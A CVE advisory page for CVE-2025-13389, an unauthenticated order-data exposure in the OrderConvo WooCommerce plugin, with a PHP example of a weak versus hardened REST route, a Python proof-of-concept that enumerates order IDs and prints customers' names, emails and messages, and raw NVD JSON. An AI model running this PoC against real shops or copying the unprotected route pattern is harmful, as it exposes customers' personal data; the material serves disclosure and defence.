Security Vulnerability Report
CVE-2025-13389 CVSS 5.3 MEDIUM

CVE-2025-13389

Published: 2025-11-25 08:15:51
Last Modified: 2026-04-15 00:35:42

Description

The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `get_order_by_id()` function in all versions up to, and including, 14. This makes it possible for unauthenticated attackers to view sensitive WooCommerce order details and private conversation messages between customers and store administrators for any order by supplying an arbitrary order ID.
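The bug class named in the description (CWE-639, an object reference that is not authorized) comes down to a REST route that hands back order data without asking who is calling. The following is an added example, not the OrderConvo plugin's own code: it registers the weak pattern (a `permission_callback` of `__return_true`) next to a hardened registration that requires the caller to be logged in and to be either a WooCommerce shop manager or the customer who placed that order. The route namespace `example/v1`, the `example_*` function names and the `messages` meta key are assumptions; `register_rest_route`, `wc_get_order`, `current_user_can` and the `WC_Order` getters are standard WordPress/WooCommerce APIs.

```php
<?php
// Added example, not the OrderConvo plugin's code. Route namespace, function
// names and the 'messages' meta key are hypothetical.

// --- Weak pattern: any caller, logged in or not, can read any order by ID. ---
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/order/(?P<id>\d+)', array(
        'methods'             => 'GET',
        'callback'            => 'example_get_order_by_id',
        'permission_callback' => '__return_true', // no authorization at all
    ) );
} );

// --- Hardened pattern: caller must be authenticated and authorized for THIS order. ---
add_action( 'rest_api_init', function () {
    register_rest_route( 'example/v1', '/secure-order/(?P<id>\d+)', array(
        'methods'             => 'GET',
        'callback'            => 'example_get_order_by_id',
        'args'                => array(
            'id' => array(
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0;
                },
                'sanitize_callback' => 'absint',
            ),
        ),
        'permission_callback' => 'example_can_view_order',
    ) );
} );

/**
 * Authorization check run by WordPress before the handler. The caller must be
 * logged in and either hold the WooCommerce manager capability or be the
 * customer attached to the requested order.
 */
function example_can_view_order( WP_REST_Request $request ) {
    if ( ! is_user_logged_in() ) {
        return new WP_Error( 'rest_forbidden', 'Authentication required.', array( 'status' => 401 ) );
    }
    if ( current_user_can( 'manage_woocommerce' ) ) {
        return true;
    }
    $order = wc_get_order( absint( $request['id'] ) );
    // Same response whether the order is missing or belongs to someone else, so
    // an authenticated customer cannot enumerate which order IDs exist.
    if ( ! $order || (int) $order->get_customer_id() !== get_current_user_id() ) {
        return new WP_Error( 'rest_forbidden', 'You cannot view this order.', array( 'status' => 403 ) );
    }
    return true;
}

/**
 * Handler shared by both routes. It returns the same fields either way, which
 * is why the permission_callback is the only thing between an unauthenticated
 * caller and another customer's order and conversation data.
 */
function example_get_order_by_id( WP_REST_Request $request ) {
    $order = wc_get_order( absint( $request['id'] ) );
    if ( ! $order ) {
        return new WP_Error( 'not_found', 'Order not found.', array( 'status' => 404 ) );
    }
    return rest_ensure_response( array(
        'id'            => $order->get_id(),
        'billing_name'  => $order->get_formatted_billing_full_name(),
        'billing_email' => $order->get_billing_email(),
        // Hypothetical: conversation messages kept as order meta under 'messages'.
        'messages'      => (array) $order->get_meta( 'messages' ),
    ) );
}
```

The decisive difference is that the hardened route ties the capability check to the specific order being requested, not just to "is someone logged in": a customer with an account is still an unauthorized caller for every order but their own. Returning `WP_Error` objects with `status` 401 and 403 from the `permission_callback` produces exactly the status codes a probe like the one in the PoC section distinguishes, so a quick curl against the endpoint while logged out is a cheap regression check after deploying a fix.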

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

OrderConvo plugin for WooCommerce <= 14 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress-site.com'

# CVE-2025-13389 PoC - Unauthorized order data access
# Target: OrderConvo plugin for WooCommerce
order_ids = [1001, 1002, 1003, 1004, 1005]

for order_id in order_ids:
    # Try to access order details without authentication
    url = f"{target}/wp-json/wcrest/v1/order/{order_id}"
    try:
        response = requests.get(url, timeout=10)
        if response.status_code == 200:
            data = response.json()
            print(f"[!] Order {order_id} accessible:")
            print(f"    Customer: {data.get('billing_name', 'N/A')}")
            print(f"    Email: {data.get('billing_email', 'N/A')}")
            print(f"    Messages: {len(data.get('messages', []))} conversation(s)")
        elif response.status_code == 401:
            print(f"[-] Order {order_id} requires authentication")
        else:
            print(f"[*] Order {order_id}: Status {response.status_code}")
    except Exception as e:
        print(f"[!] Error accessing order {order_id}: {e}")
```

References

- https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L142
- https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L142
- https://plugins.trac.wordpress.org/changeset/3439999/
- https://www.wordfence.com/threat-intel/vulnerabilities/id/9149d2c6-b6c7-430d-8886-c8c5de483220?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13389",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-25T08:15:51.010",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Admin and Customer Messages After Order for WooCommerce: OrderConvo plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the `get_order_by_id()` function in all versions up to, and including, 14. This makes it possible for unauthenticated attackers to view sensitive WooCommerce order details and private conversation messages between customers and store administrators for any order by supplying an arbitrary order ID."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-639"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/tags/14/includes/wprest.class.php#L142",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/admin-and-client-message-after-order-for-woocommerce/trunk/includes/wprest.class.php#L142",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3439999/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9149d2c6-b6c7-430d-8886-c8c5de483220?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```